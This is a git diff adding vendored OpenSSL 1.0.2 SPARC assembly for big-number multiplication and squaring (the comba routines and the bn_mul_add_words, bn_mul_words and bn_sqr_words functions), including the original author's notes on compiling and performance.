+	umul	a_2,b_2,t_1	!mul_add_c(a[2],b[2],c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	umul	a_1,b_3,t_1	!=!mul_add_c(a[1],b[3],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	st	c_2,rp(4)	!r[4]=c2;
+
+	umul	a_2,b_3,t_1	!mul_add_c(a[2],b[3],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2
+	umul	a_3,b_2,t_1	!mul_add_c(a[3],b[2],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	st	c_3,rp(5)	!r[5]=c3;
+	addx	c_2,%g0,c_2	!=
+
+	umul	a_3,b_3,t_1	!mul_add_c(a[3],b[3],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	st	c_1,rp(6)	!r[6]=c1;
+	st	c_2,rp(7)	!r[7]=c2;
+	
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_mul_comba4,#function
+.size	bn_mul_comba4,(.-bn_mul_comba4)
+
+.align	32
+
+.global bn_sqr_comba8
+bn_sqr_comba8:
+	save	%sp,FRAME_SIZE,%sp
+	ld	ap(0),a_0
+	ld	ap(1),a_1
+	umul	a_0,a_0,c_1	!=!sqr_add_c(a,0,c1,c2,c3);
+	rd	%y,c_2
+	st	c_1,rp(0)	!r[0]=c1;
+
+	ld	ap(2),a_2
+	umul	a_0,a_1,t_1	!=!sqr_add_c2(a,1,0,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	%g0,t_2,c_3
+	addx	%g0,%g0,c_1	!=
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3
+	st	c_2,rp(1)	!r[1]=c2;
+	addx	c_1,%g0,c_1	!=
+
+	umul	a_2,a_0,t_1	!sqr_add_c2(a,2,0,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	%g0,%g0,c_2
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	ld	ap(3),a_3
+	umul	a_1,a_1,t_1	!sqr_add_c(a,1,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	st	c_3,rp(2)	!r[2]=c3;
+
+	umul	a_0,a_3,t_1	!=!sqr_add_c2(a,3,0,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	%g0,%g0,c_3	!=
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	ld	ap(4),a_4
+	addx	c_3,%g0,c_3	!=
+	umul	a_1,a_2,t_1	!sqr_add_c2(a,2,1,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(3)	!r[3]=c1;
+
+	umul	a_4,a_0,t_1	!sqr_add_c2(a,4,0,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_3,a_1,t_1	!sqr_add_c2(a,3,1,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	ld	ap(5),a_5
+	umul	a_2,a_2,t_1	!sqr_add_c(a,2,c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	st	c_2,rp(4)	!r[4]=c2;
+	addx	c_1,%g0,c_1	!=
+
+	umul	a_0,a_5,t_1	!sqr_add_c2(a,5,0,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	%g0,%g0,c_2
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	umul	a_1,a_4,t_1	!sqr_add_c2(a,4,1,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	ld	ap(6),a_6
+	umul	a_2,a_3,t_1	!sqr_add_c2(a,3,2,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	st	c_3,rp(5)	!r[5]=c3;
+
+	umul	a_6,a_0,t_1	!sqr_add_c2(a,6,0,c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	%g0,%g0,c_3
+	addcc	c_1,t_1,c_1	!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_5,a_1,t_1	!sqr_add_c2(a,5,1,c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	addcc	c_1,t_1,c_1	!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_4,a_2,t_1	!sqr_add_c2(a,4,2,c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	addcc	c_1,t_1,c_1	!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	ld	ap(7),a_7
+	umul	a_3,a_3,t_1	!=!sqr_add_c(a,3,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(6)	!r[6]=c1;
+
+	umul	a_0,a_7,t_1	!sqr_add_c2(a,7,0,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_1,a_6,t_1	!sqr_add_c2(a,6,1,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_2,a_5,t_1	!sqr_add_c2(a,5,2,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_3,a_4,t_1	!sqr_add_c2(a,4,3,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	st	c_2,rp(7)	!r[7]=c2;
+
+	umul	a_7,a_1,t_1	!sqr_add_c2(a,7,1,c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2
+	addcc	c_3,t_1,c_3	!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_6,a_2,t_1	!sqr_add_c2(a,6,2,c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	addcc	c_3,t_1,c_3	!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_5,a_3,t_1	!sqr_add_c2(a,5,3,c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	addcc	c_3,t_1,c_3	!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_4,a_4,t_1	!sqr_add_c(a,4,c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	st	c_3,rp(8)	!r[8]=c3;
+	addx	c_2,%g0,c_2	!=
+
+	umul	a_2,a_7,t_1	!sqr_add_c2(a,7,2,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	%g0,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	umul	a_3,a_6,t_1	!sqr_add_c2(a,6,3,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	umul	a_4,a_5,t_1	!sqr_add_c2(a,5,4,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(9)	!r[9]=c1;
+
+	umul	a_7,a_3,t_1	!sqr_add_c2(a,7,3,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_6,a_4,t_1	!sqr_add_c2(a,6,4,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_5,a_5,t_1	!sqr_add_c(a,5,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	st	c_2,rp(10)	!r[10]=c2;
+
+	umul	a_4,a_7,t_1	!=!sqr_add_c2(a,7,4,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2	!=
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_5,a_6,t_1	!=!sqr_add_c2(a,6,5,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1
+	st	c_3,rp(11)	!r[11]=c3;
+	addx	c_2,%g0,c_2	!=
+
+	umul	a_7,a_5,t_1	!sqr_add_c2(a,7,5,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	%g0,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	umul	a_6,a_6,t_1	!sqr_add_c(a,6,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	st	c_1,rp(12)	!r[12]=c1;
+
+	umul	a_6,a_7,t_1	!sqr_add_c2(a,7,6,c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	addcc	c_2,t_1,c_2	!=
+	addxcc	c_3,t_2,c_3
+	st	c_2,rp(13)	!r[13]=c2;
+	addx	c_1,%g0,c_1	!=
+
+	umul	a_7,a_7,t_1	!sqr_add_c(a,7,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	st	c_3,rp(14)	!r[14]=c3;
+	st	c_1,rp(15)	!r[15]=c1;
+
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_sqr_comba8,#function
+.size	bn_sqr_comba8,(.-bn_sqr_comba8)
+
+.align	32
+
+.global bn_sqr_comba4
+/*
+ * void bn_sqr_comba4(r,a)
+ * BN_ULONG *r,*a;
+ */
+bn_sqr_comba4:
+	save	%sp,FRAME_SIZE,%sp
+	ld	ap(0),a_0
+	umul	a_0,a_0,c_1	!sqr_add_c(a,0,c1,c2,c3);
+	ld	ap(1),a_1	!=
+	rd	%y,c_2
+	st	c_1,rp(0)	!r[0]=c1;
+
+	ld	ap(2),a_2
+	umul	a_0,a_1,t_1	!=!sqr_add_c2(a,1,0,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	%g0,t_2,c_3
+	addx	%g0,%g0,c_1	!=
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	st	c_2,rp(1)	!r[1]=c2;
+
+	umul	a_2,a_0,t_1	!sqr_add_c2(a,2,0,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	ld	ap(3),a_3
+	umul	a_1,a_1,t_1	!sqr_add_c(a,1,c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	st	c_3,rp(2)	!r[2]=c3;
+	addx	c_2,%g0,c_2	!=
+
+	umul	a_0,a_3,t_1	!sqr_add_c2(a,3,0,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	%g0,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	umul	a_1,a_2,t_1	!sqr_add_c2(a,2,1,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	addcc	c_1,t_1,c_1
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(3)	!r[3]=c1;
+
+	umul	a_3,a_1,t_1	!sqr_add_c2(a,3,1,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	addcc	c_2,t_1,c_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_2,a_2,t_1	!sqr_add_c(a,2,c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	st	c_2,rp(4)	!r[4]=c2;
+
+	umul	a_2,a_3,t_1	!=!sqr_add_c2(a,3,2,c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2	!=
+	addcc	c_3,t_1,c_3
+	addxcc	c_1,t_2,c_1
+	st	c_3,rp(5)	!r[5]=c3;
+	addx	c_2,%g0,c_2	!=
+
+	umul	a_3,a_3,t_1	!sqr_add_c(a,3,c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	st	c_1,rp(6)	!r[6]=c1;
+	st	c_2,rp(7)	!r[7]=c2;
+	
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_sqr_comba4,#function
+.size	bn_sqr_comba4,(.-bn_sqr_comba4)
+
+.align	32
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv8plus.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv8plus.S
new file mode 100644
index 0000000..63de186
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv8plus.S
@@ -0,0 +1,1558 @@
+.ident	"sparcv8plus.s, Version 1.4"
+.ident	"SPARC v9 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
+
+/*
+ * ====================================================================
+ * Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+ * project.
+ *
+ * Rights for redistribution and usage in source and binary forms are
+ * granted according to the OpenSSL license. Warranty of any kind is
+ * disclaimed.
+ * ====================================================================
+ */
+
+/*
+ * This is my modest contributon to OpenSSL project (see
+ * http://www.openssl.org/ for more information about it) and is
+ * a drop-in UltraSPARC ISA replacement for crypto/bn/bn_asm.c
+ * module. For updates see http://fy.chalmers.se/~appro/hpe/.
+ *
+ * Questions-n-answers.
+ *
+ * Q. How to compile?
+ * A. With SC4.x/SC5.x:
+ *
+ *	cc -xarch=v8plus -c bn_asm.sparc.v8plus.S -o bn_asm.o
+ *
+ *    and with gcc:
+ *
+ *	gcc -mcpu=ultrasparc -c bn_asm.sparc.v8plus.S -o bn_asm.o
+ *
+ *    or if above fails (it does if you have gas installed):
+ *
+ *	gcc -E bn_asm.sparc.v8plus.S | as -xarch=v8plus /dev/fd/0 -o bn_asm.o
+ *
+ *    Quick-n-dirty way to fuse the module into the library.
+ *    Provided that the library is already configured and built
+ *    (in 0.9.2 case with no-asm option):
+ *
+ *	# cd crypto/bn
+ *	# cp /some/place/bn_asm.sparc.v8plus.S .
+ *	# cc -xarch=v8plus -c bn_asm.sparc.v8plus.S -o bn_asm.o
+ *	# make
+ *	# cd ../..
+ *	# make; make test
+ *
+ *    Quick-n-dirty way to get rid of it:
+ *
+ *	# cd crypto/bn
+ *	# touch bn_asm.c
+ *	# make
+ *	# cd ../..
+ *	# make; make test
+ *
+ * Q. V8plus achitecture? What kind of beast is that?
+ * A. Well, it's rather a programming model than an architecture...
+ *    It's actually v9-compliant, i.e. *any* UltraSPARC, CPU under
+ *    special conditions, namely when kernel doesn't preserve upper
+ *    32 bits of otherwise 64-bit registers during a context switch.
+ *
+ * Q. Why just UltraSPARC? What about SuperSPARC?
+ * A. Original release did target UltraSPARC only. Now SuperSPARC
+ *    version is provided along. Both version share bn_*comba[48]
+ *    implementations (see comment later in code for explanation).
+ *    But what's so special about this UltraSPARC implementation?
+ *    Why didn't I let compiler do the job? Trouble is that most of
+ *    available compilers (well, SC5.0 is the only exception) don't
+ *    attempt to take advantage of UltraSPARC's 64-bitness under
+ *    32-bit kernels even though it's perfectly possible (see next
+ *    question).
+ *
+ * Q. 64-bit registers under 32-bit kernels? Didn't you just say it
+ *    doesn't work?
+ * A. You can't adress *all* registers as 64-bit wide:-( The catch is
+ *    that you actually may rely upon %o0-%o5 and %g1-%g4 being fully
+ *    preserved if you're in a leaf function, i.e. such never calling
+ *    any other functions. All functions in this module are leaf and
+ *    10 registers is a handful. And as a matter of fact none-"comba"
+ *    routines don't require even that much and I could even afford to
+ *    not allocate own stack frame for 'em:-)
+ *
+ * Q. What about 64-bit kernels?
+ * A. What about 'em? Just kidding:-) Pure 64-bit version is currently
+ *    under evaluation and development...
+ *
+ * Q. What about shared libraries?
+ * A. What about 'em? Kidding again:-) Code does *not* contain any
+ *    code position dependencies and it's safe to include it into
+ *    shared library as is.
+ *
+ * Q. How much faster does it go?
+ * A. Do you have a good benchmark? In either case below is what I
+ *    experience with crypto/bn/expspeed.c test program:
+ *
+ *	v8plus module on U10/300MHz against bn_asm.c compiled with:
+ *
+ *	cc-5.0 -xarch=v8plus -xO5 -xdepend	+7-12%
+ *	cc-4.2 -xarch=v8plus -xO5 -xdepend	+25-35%
+ *	egcs-1.1.2 -mcpu=ultrasparc -O3		+35-45%
+ *
+ *	v8 module on SS10/60MHz against bn_asm.c compiled with:
+ *
+ *	cc-5.0 -xarch=v8 -xO5 -xdepend		+7-10%
+ *	cc-4.2 -xarch=v8 -xO5 -xdepend		+10%
+ *	egcs-1.1.2 -mv8 -O3			+35-45%
+ *
+ *    As you can see it's damn hard to beat the new Sun C compiler
+ *    and it's in first place GNU C users who will appreciate this
+ *    assembler implementation:-)	
+ */
+
+/*
+ * Revision history.
+ *
+ * 1.0	- initial release;
+ * 1.1	- new loop unrolling model(*);
+ *	- some more fine tuning;
+ * 1.2	- made gas friendly;
+ *	- updates to documentation concerning v9;
+ *	- new performance comparison matrix;
+ * 1.3	- fixed problem with /usr/ccs/lib/cpp;
+ * 1.4	- native V9 bn_*_comba[48] implementation (15% more efficient)
+ *	  resulting in slight overall performance kick;
+ *	- some retunes;
+ *	- support for GNU as added;
+ *
+ * (*)	Originally unrolled loop looked like this:
+ *	    for (;;) {
+ *		op(p+0); if (--n==0) break;
+ *		op(p+1); if (--n==0) break;
+ *		op(p+2); if (--n==0) break;
+ *		op(p+3); if (--n==0) break;
+ *		p+=4;
+ *	    }
+ *	I unroll according to following:
+ *	    while (n&~3) {
+ *		op(p+0); op(p+1); op(p+2); op(p+3);
+ *		p+=4; n=-4;
+ *	    }
+ *	    if (n) {
+ *		op(p+0); if (--n==0) return;
+ *		op(p+2); if (--n==0) return;
+ *		op(p+3); return;
+ *	    }
+ */
+
+#if defined(__SUNPRO_C) && defined(__sparcv9)
+  /* They've said -xarch=v9 at command line */
+  .register	%g2,#scratch
+  .register	%g3,#scratch
+# define	FRAME_SIZE	-192
+#elif defined(__GNUC__) && defined(__arch64__)
+  /* They've said -m64 at command line */
+  .register	%g2,#scratch
+  .register	%g3,#scratch
+# define	FRAME_SIZE	-192
+#else 
+# define	FRAME_SIZE	-96
+#endif 
+/*
+ * GNU assembler can't stand stuw:-(
+ */
+#define stuw st
+
+.section	".text",#alloc,#execinstr
+.file		"bn_asm.sparc.v8plus.S"
+
+.align	32
+
+.global bn_mul_add_words
+/*
+ * BN_ULONG bn_mul_add_words(rp,ap,num,w)
+ * BN_ULONG *rp,*ap;
+ * int num;
+ * BN_ULONG w;
+ */
+bn_mul_add_words:
+	sra	%o2,%g0,%o2	! signx %o2
+	brgz,a	%o2,.L_bn_mul_add_words_proceed
+	lduw	[%o1],%g2
+	retl
+	clr	%o0
+	nop
+	nop
+	nop
+
+.L_bn_mul_add_words_proceed:
+	srl	%o3,%g0,%o3	! clruw	%o3
+	andcc	%o2,-4,%g0
+	bz,pn	%icc,.L_bn_mul_add_words_tail
+	clr	%o5
+
+.L_bn_mul_add_words_loop:	! wow! 32 aligned!
+	lduw	[%o0],%g1
+	lduw	[%o1+4],%g3
+	mulx	%o3,%g2,%g2
+	add	%g1,%o5,%o4
+	nop
+	add	%o4,%g2,%o4
+	stuw	%o4,[%o0]
+	srlx	%o4,32,%o5
+
+	lduw	[%o0+4],%g1
+	lduw	[%o1+8],%g2
+	mulx	%o3,%g3,%g3
+	add	%g1,%o5,%o4
+	dec	4,%o2
+	add	%o4,%g3,%o4
+	stuw	%o4,[%o0+4]
+	srlx	%o4,32,%o5
+
+	lduw	[%o0+8],%g1
+	lduw	[%o1+12],%g3
+	mulx	%o3,%g2,%g2
+	add	%g1,%o5,%o4
+	inc	16,%o1
+	add	%o4,%g2,%o4
+	stuw	%o4,[%o0+8]
+	srlx	%o4,32,%o5
+
+	lduw	[%o0+12],%g1
+	mulx	%o3,%g3,%g3
+	add	%g1,%o5,%o4
+	inc	16,%o0
+	add	%o4,%g3,%o4
+	andcc	%o2,-4,%g0
+	stuw	%o4,[%o0-4]
+	srlx	%o4,32,%o5
+	bnz,a,pt	%icc,.L_bn_mul_add_words_loop
+	lduw	[%o1],%g2
+
+	brnz,a,pn	%o2,.L_bn_mul_add_words_tail
+	lduw	[%o1],%g2
+.L_bn_mul_add_words_return:
+	retl
+	mov	%o5,%o0
+
+.L_bn_mul_add_words_tail:
+	lduw	[%o0],%g1
+	mulx	%o3,%g2,%g2
+	add	%g1,%o5,%o4
+	dec	%o2
+	add	%o4,%g2,%o4
+	srlx	%o4,32,%o5
+	brz,pt	%o2,.L_bn_mul_add_words_return
+	stuw	%o4,[%o0]
+
+	lduw	[%o1+4],%g2
+	lduw	[%o0+4],%g1
+	mulx	%o3,%g2,%g2
+	add	%g1,%o5,%o4
+	dec	%o2
+	add	%o4,%g2,%o4
+	srlx	%o4,32,%o5
+	brz,pt	%o2,.L_bn_mul_add_words_return
+	stuw	%o4,[%o0+4]
+
+	lduw	[%o1+8],%g2
+	lduw	[%o0+8],%g1
+	mulx	%o3,%g2,%g2
+	add	%g1,%o5,%o4
+	add	%o4,%g2,%o4
+	stuw	%o4,[%o0+8]
+	retl
+	srlx	%o4,32,%o0
+
+.type	bn_mul_add_words,#function
+.size	bn_mul_add_words,(.-bn_mul_add_words)
+
+.align	32
+
+.global bn_mul_words
+/*
+ * BN_ULONG bn_mul_words(rp,ap,num,w)
+ * BN_ULONG *rp,*ap;
+ * int num;
+ * BN_ULONG w;
+ */
+bn_mul_words:
+	sra	%o2,%g0,%o2	! signx %o2
+	brgz,a	%o2,.L_bn_mul_words_proceeed
+	lduw	[%o1],%g2
+	retl
+	clr	%o0
+	nop
+	nop
+	nop
+
+.L_bn_mul_words_proceeed:
+	srl	%o3,%g0,%o3	! clruw	%o3
+	andcc	%o2,-4,%g0
+	bz,pn	%icc,.L_bn_mul_words_tail
+	clr	%o5
+
+.L_bn_mul_words_loop:		! wow! 32 aligned!
+	lduw	[%o1+4],%g3
+	mulx	%o3,%g2,%g2
+	add	%g2,%o5,%o4
+	nop
+	stuw	%o4,[%o0]
+	srlx	%o4,32,%o5
+
+	lduw	[%o1+8],%g2
+	mulx	%o3,%g3,%g3
+	add	%g3,%o5,%o4
+	dec	4,%o2
+	stuw	%o4,[%o0+4]
+	srlx	%o4,32,%o5
+
+	lduw	[%o1+12],%g3
+	mulx	%o3,%g2,%g2
+	add	%g2,%o5,%o4
+	inc	16,%o1
+	stuw	%o4,[%o0+8]
+	srlx	%o4,32,%o5
+
+	mulx	%o3,%g3,%g3
+	add	%g3,%o5,%o4
+	inc	16,%o0
+	stuw	%o4,[%o0-4]
+	srlx	%o4,32,%o5
+	andcc	%o2,-4,%g0
+	bnz,a,pt	%icc,.L_bn_mul_words_loop
+	lduw	[%o1],%g2
+	nop
+	nop
+
+	brnz,a,pn	%o2,.L_bn_mul_words_tail
+	lduw	[%o1],%g2
+.L_bn_mul_words_return:
+	retl
+	mov	%o5,%o0
+
+.L_bn_mul_words_tail:
+	mulx	%o3,%g2,%g2
+	add	%g2,%o5,%o4
+	dec	%o2
+	srlx	%o4,32,%o5
+	brz,pt	%o2,.L_bn_mul_words_return
+	stuw	%o4,[%o0]
+
+	lduw	[%o1+4],%g2
+	mulx	%o3,%g2,%g2
+	add	%g2,%o5,%o4
+	dec	%o2
+	srlx	%o4,32,%o5
+	brz,pt	%o2,.L_bn_mul_words_return
+	stuw	%o4,[%o0+4]
+
+	lduw	[%o1+8],%g2
+	mulx	%o3,%g2,%g2
+	add	%g2,%o5,%o4
+	stuw	%o4,[%o0+8]
+	retl
+	srlx	%o4,32,%o0
+
+.type	bn_mul_words,#function
+.size	bn_mul_words,(.-bn_mul_words)
+
+.align  32
+.global	bn_sqr_words
+/*
+ * void bn_sqr_words(r,a,n)
+ * BN_ULONG *r,*a;
+ * int n;
+ */
+bn_sqr_words:
+	sra	%o2,%g0,%o2	! signx %o2
+	brgz,a	%o2,.L_bn_sqr_words_proceeed
+	lduw	[%o1],%g2
+	retl
+	clr	%o0
+	nop
+	nop
+	nop
+
+.L_bn_sqr_words_proceeed:
+	andcc	%o2,-4,%g0
+	nop
+	bz,pn	%icc,.L_bn_sqr_words_tail
+	nop
+
+.L_bn_sqr_words_loop:		! wow! 32 aligned!
+	lduw	[%o1+4],%g3
+	mulx	%g2,%g2,%o4
+	stuw	%o4,[%o0]
+	srlx	%o4,32,%o5
+	stuw	%o5,[%o0+4]
+	nop
+
+	lduw	[%o1+8],%g2
+	mulx	%g3,%g3,%o4
+	dec	4,%o2
+	stuw	%o4,[%o0+8]
+	srlx	%o4,32,%o5
+	stuw	%o5,[%o0+12]
+
+	lduw	[%o1+12],%g3
